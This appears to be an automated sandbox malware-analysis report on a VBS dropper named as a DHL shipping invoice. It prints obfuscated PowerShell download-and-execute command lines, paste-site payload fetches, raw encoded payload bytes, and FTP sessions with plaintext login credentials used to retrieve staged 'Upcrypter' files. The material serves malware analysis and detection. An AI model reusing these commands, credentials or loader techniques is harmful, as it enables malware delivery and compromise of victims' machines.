                                          2024-10-14 09:10:27 UTC1369INData Raw: e2 86 93 42 4d 77 e2 86 93 3a e2 86 93 77 43 78 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 53 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 67 34 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 68 71 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 67 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 55 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 46 e2
                                          Data Ascii: BMw:wCx:::::Q::ES:B::::/g4::Dhq::::/gw::EUE::::Mw:::BQ::::F
                                          2024-10-14 09:10:27 UTC1369INData Raw: 3a e2 86 93 e2 86 93 3a e2 86 93 63 43 69 35 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 63 77 30 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 70 36 4b 69 67 4f e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 49 4f 67 48 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 67 43 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 63 77 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 6f 42 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 76 34 4f e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2
                                          Data Ascii: ::cCi5:::Gcw0:::p6KigO:::KIOgH:::gCg:::C:G::::cw8:::ooBw::Bv4O:::g::
                                          2024-10-14 09:10:27 UTC1091INData Raw: e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 4b 67 4d 77 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4f e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 66 67 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 55 2f 67 45 71 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 4d e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86
                                          Data Ascii: ::CiL:::GKgMwC::O:::::::::Dg:::::fgI:::QU/gEq:::DM:g:Cw:::
                                          2024-10-14 09:10:27 UTC1369INData Raw: 32 30 30 30 0d 0a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 6a 6a 45 2f 2f 2f 2f 4f 75 66 2f 2f 2f 38 6d 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 7a 76 2f 2f 2f 7a 6a 58 2f 2f 2f 2f 4f 4b 44 2f 2f 2f 38 34 32 2f 2f 2f 2f 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d 77 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2 86 93
                                          Data Ascii: 2000::Dgg::::KjjE////Ouf///8mI::::::4zv///zjX////OKD///842////w::::MwC::M:::::::::Dg:
                                          2024-10-14 09:10:27 UTC1369INData Raw: 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 66 67 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 55 2f 67 45 71 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 4d e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 34 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93
                                          Data Ascii: ::::Dg:::::fgQ:::QU/gEq:::DM:g:Cw:::::::::4:::::H4E::
                                          2024-10-14 09:10:27 UTC1369INData Raw: 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 36 78 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 65 30 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 34 55 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 68 65 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4f 44 6e 2f 2f 2f 38 34 74 66 2f 2f 2f 7a 67 7a 2f 2f 2f 2f 4f 53 37 2f 2f 2f 38 6d 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 65 50 2f 2f 2f 7a 67 65 2f 2f 2f 2f 4f 68 6e 2f 2f 2f 38 6d 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a
                                          Data Ascii: :::H6x:::Ee0s:::Q4Uw:::Dhe::::ODn///84tf///zgz////OS7///8mI::::::4eP///zge////Ohn///8mI::::::


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.549728188.114.97.34431436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-14 09:10:33 UTC43OUTGET /d/qYZ64/0 HTTP/1.1
                                          Host: paste.ee
                                          2024-10-14 09:10:33 UTC1229INHTTP/1.1 200 OK
                                          Date: Mon, 14 Oct 2024 09:10:33 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Content-Length: 582
                                          Connection: close
                                          Cache-Control: max-age=2592000
                                          strict-transport-security: max-age=63072000
                                          x-frame-options: DENY
                                          x-content-type-options: nosniff
                                          x-xss-protection: 1; mode=block
                                          content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WyutpipntHgAhD83iZ0hkzxll9CIcu9jS2%2FpN%2Bv9u%2BmhqOFKvhOXPTArMWC5CegRSfUXAH%2F4QecalMAOPQFHTfm3Py5RvatDhd001nqal737wmKpPT0f8rkXdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8d266fd96b7142b0-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-10-14 09:10:33 UTC140INData Raw: 24 7a 73 62 44 74 20 3d 20 27 43 3a 5c 57 69 6e 64 6f 77 73 5c 4d 69 63 72 6f 73 6f 66 74 2e 4e 45 54 5c 27 20 2b 20 27 46 72 61 6d 65 77 6f 72 6b 5c 76 34 2e 30 2e 33 30 33 31 39 5c 27 20 2b 20 27 41 64 64 49 6e 50 72 6f 63 65 73 73 33 32 2e 65 78 65 27 3b 0a 0a 24 58 6f 68 73 4b 20 3d 20 22 3f 3f 25 79 7a 58 56 4d 25 22 0a 0a 24 55 65 62 54 61 20 3d 20 27 e2 86 93 3a e2 86 93 27 3b 0a 24 58 4b 76 48 76 20 3d 20 27
                                          Data Ascii: $zsbDt = 'C:\Windows\Microsoft.NET\' + 'Framework\v4.0.30319\' + 'AddInProcess32.exe';$XohsK = "??%yzXVM%"$UebTa = ':';$XKvHv = '
                                          2024-10-14 09:10:33 UTC442INData Raw: 41 27 3b 0a 0a 24 57 59 76 74 74 20 3d 20 27 25 71 6c 78 4b 50 25 27 2e 72 65 70 6c 61 63 65 28 20 24 55 65 62 54 61 2c 20 24 58 4b 76 48 76 20 29 3b 0a 5b 42 79 74 65 5b 5d 5d 20 24 6c 61 57 77 4a 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 20 24 57 59 76 74 74 20 29 3b 0a 0a 24 72 51 43 4f 4e 20 3d 20 27 25 6e 6b 47 4d 76 25 27 2e 72 65 70 6c 61 63 65 28 20 24 55 65 62 54 61 2c 20 24 58 4b 76 48 76 20 29 3b 0a 5b 42 79 74 65 5b 5d 5d 20 24 61 6e 4b 6c 6f 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 20 24 72 51 43 4f 4e 20 29 3b 0a 0a 24 61 7a 45 51 61 20 3d 20 22 43 6c 61 73 73 31 22 3b 0a 24 63 50 43 51 6f 20 3d 20
                                          Data Ascii: A';$WYvtt = '%qlxKP%'.replace( $UebTa, $XKvHv );[Byte[]] $laWwJ = [System.Convert]::FromBase64String( $WYvtt );$rQCON = '%nkGMv%'.replace( $UebTa, $XKvHv );[Byte[]] $anKlo = [System.Convert]::FromBase64String( $rQCON );$azEQa = "Class1";$cPCQo =


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.549744104.20.3.2354437224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-14 09:10:35 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                          Host: pastebin.com
                                          Connection: Keep-Alive
                                          2024-10-14 09:10:35 UTC397INHTTP/1.1 200 OK
                                          Date: Mon, 14 Oct 2024 09:10:35 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          x-frame-options: DENY
                                          x-content-type-options: nosniff
                                          x-xss-protection: 1;mode=block
                                          cache-control: public, max-age=1801
                                          CF-Cache-Status: HIT
                                          Age: 782
                                          Last-Modified: Mon, 14 Oct 2024 08:57:33 GMT
                                          Server: cloudflare
                                          CF-RAY: 8d266fe88c5a43d6-EWR
                                          2024-10-14 09:10:35 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                          Data Ascii: 6false,
                                          2024-10-14 09:10:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.549776104.20.3.2354437484C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-14 09:10:40 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                          Host: pastebin.com
                                          Connection: Keep-Alive
                                          2024-10-14 09:10:40 UTC397INHTTP/1.1 200 OK
                                          Date: Mon, 14 Oct 2024 09:10:40 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          x-frame-options: DENY
                                          x-content-type-options: nosniff
                                          x-xss-protection: 1;mode=block
                                          cache-control: public, max-age=1801
                                          CF-Cache-Status: HIT
                                          Age: 787
                                          Last-Modified: Mon, 14 Oct 2024 08:57:33 GMT
                                          Server: cloudflare
                                          CF-RAY: 8d2670090bffc454-EWR
                                          2024-10-14 09:10:40 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                          Data Ascii: 6false,
                                          2024-10-14 09:10:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.549819104.20.3.2354437804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-14 09:10:48 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                          Host: pastebin.com
                                          Connection: Keep-Alive
                                          2024-10-14 09:10:48 UTC397INHTTP/1.1 200 OK
                                          Date: Mon, 14 Oct 2024 09:10:48 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          x-frame-options: DENY
                                          x-content-type-options: nosniff
                                          x-xss-protection: 1;mode=block
                                          cache-control: public, max-age=1801
                                          CF-Cache-Status: HIT
                                          Age: 795
                                          Last-Modified: Mon, 14 Oct 2024 08:57:33 GMT
                                          Server: cloudflare
                                          CF-RAY: 8d26703969dd4319-EWR
                                          2024-10-14 09:10:48 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                          Data Ascii: 6false,
                                          2024-10-14 09:10:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          TimestampSource PortDest PortSource IPDest IPCommands
                                          Oct 14, 2024 11:10:17.729788065 CEST2149704191.252.83.213192.168.2.5220 "Servico de FTP da Locaweb"
                                          Oct 14, 2024 11:10:17.730783939 CEST4970421192.168.2.5191.252.83.213USER desckvbrat1
                                          Oct 14, 2024 11:10:17.954030991 CEST2149704191.252.83.213192.168.2.5331 Username ok, send password.
                                          Oct 14, 2024 11:10:17.954219103 CEST4970421192.168.2.5191.252.83.213PASS developerpro21578Jp@@
                                          Oct 14, 2024 11:10:18.183656931 CEST2149704191.252.83.213192.168.2.5230 Login successful.
                                          Oct 14, 2024 11:10:18.407048941 CEST2149704191.252.83.213192.168.2.5501 Invalid argument.
                                          Oct 14, 2024 11:10:18.407314062 CEST4970421192.168.2.5191.252.83.213PWD
                                          Oct 14, 2024 11:10:18.630659103 CEST2149704191.252.83.213192.168.2.5257 "/" is the current directory.
                                          Oct 14, 2024 11:10:18.631093025 CEST4970421192.168.2.5191.252.83.213TYPE I
                                          Oct 14, 2024 11:10:18.854322910 CEST2149704191.252.83.213192.168.2.5200 Type set to: Binary.
                                          Oct 14, 2024 11:10:18.854621887 CEST4970421192.168.2.5191.252.83.213PASV
                                          Oct 14, 2024 11:10:19.082650900 CEST2149704191.252.83.213192.168.2.5227 Entering passive mode (191,252,83,213,236,240).
                                          Oct 14, 2024 11:10:19.096518993 CEST4970421192.168.2.5191.252.83.213RETR Upcrypter/01/DLL01.txt
                                          Oct 14, 2024 11:10:19.321160078 CEST2149704191.252.83.213192.168.2.5150 File status okay. About to open data connection.
                                          Oct 14, 2024 11:10:19.712748051 CEST2149704191.252.83.213192.168.2.5226 Transfer complete.
                                          Oct 14, 2024 11:10:26.042962074 CEST4970421192.168.2.5191.252.83.213PASV
                                          Oct 14, 2024 11:10:26.266140938 CEST2149704191.252.83.213192.168.2.5227 Entering passive mode (191,252,83,213,235,221).
                                          Oct 14, 2024 11:10:26.271873951 CEST4970421192.168.2.5191.252.83.213RETR Upcrypter/01/Rumpe.txt
                                          Oct 14, 2024 11:10:26.498501062 CEST2149704191.252.83.213192.168.2.5150 File status okay. About to open data connection.
                                          Oct 14, 2024 11:10:26.888885975 CEST2149704191.252.83.213192.168.2.5226 Transfer complete.
                                          Oct 14, 2024 11:10:30.612116098 CEST2149716191.252.83.213192.168.2.5220 "Servico de FTP da Locaweb"
                                          Oct 14, 2024 11:10:30.612220049 CEST4971621192.168.2.5191.252.83.213USER desckvbrat1
                                          Oct 14, 2024 11:10:30.839396954 CEST2149716191.252.83.213192.168.2.5331 Username ok, send password.
                                          Oct 14, 2024 11:10:30.839591026 CEST4971621192.168.2.5191.252.83.213PASS developerpro21578Jp@@
                                          Oct 14, 2024 11:10:31.073117971 CEST2149716191.252.83.213192.168.2.5230 Login successful.
                                          Oct 14, 2024 11:10:31.298346043 CEST2149716191.252.83.213192.168.2.5501 Invalid argument.
                                          Oct 14, 2024 11:10:31.298640966 CEST4971621192.168.2.5191.252.83.213PWD
                                          Oct 14, 2024 11:10:31.524405956 CEST2149716191.252.83.213192.168.2.5257 "/" is the current directory.
                                          Oct 14, 2024 11:10:31.530569077 CEST4971621192.168.2.5191.252.83.213TYPE I
                                          Oct 14, 2024 11:10:31.757215977 CEST2149716191.252.83.213192.168.2.5200 Type set to: Binary.
                                          Oct 14, 2024 11:10:31.757395029 CEST4971621192.168.2.5191.252.83.213PASV
                                          Oct 14, 2024 11:10:31.983119011 CEST2149716191.252.83.213192.168.2.5227 Entering passive mode (191,252,83,213,236,197).
                                          Oct 14, 2024 11:10:31.989350080 CEST4971621192.168.2.5191.252.83.213RETR Upcrypter/01/Entry.txt
                                          Oct 14, 2024 11:10:32.215228081 CEST2149716191.252.83.213192.168.2.5150 File status okay. About to open data connection.
                                          Oct 14, 2024 11:10:32.611712933 CEST2149716191.252.83.213192.168.2.5226 Transfer complete.

                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:05:10:09
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs"
                                          Imagebase:0x7ff656220000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:2
                                          Start time:05:10:09
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' + [char]66 + 'wAHQAZg' + [char]66 + 'AADEAdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'wAHQAZgAnACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAKQAnAEAAQA' + [char]66 + 'wAEoAOAA3ADUAMQAyAG8Acg' + [char]66 + 'wAHIAZQ' + [char]66 + 'wAG8AbA' + [char]66 + 'lAHYAZQ' + [char]66 + 'kACcALAApACkAOQA0ACwANgAxADEALAA3ADkALAA0ADEAMQAsADgAOQAsADgAMQAxACwANwAwADEALAA5ADkALAA1ADEAMQAsADEAMAAxACwAMAAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAoAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMAaw' + [char]66 + 'yAG8Adw' + [char]66 + '0AGUATgAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbwAtAHcAZQ' + [char]66 + 'uACAAPQAgAHMAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQwAuAGcAag' + [char]66 + 'nAGYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7AGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ' + [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7AH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + 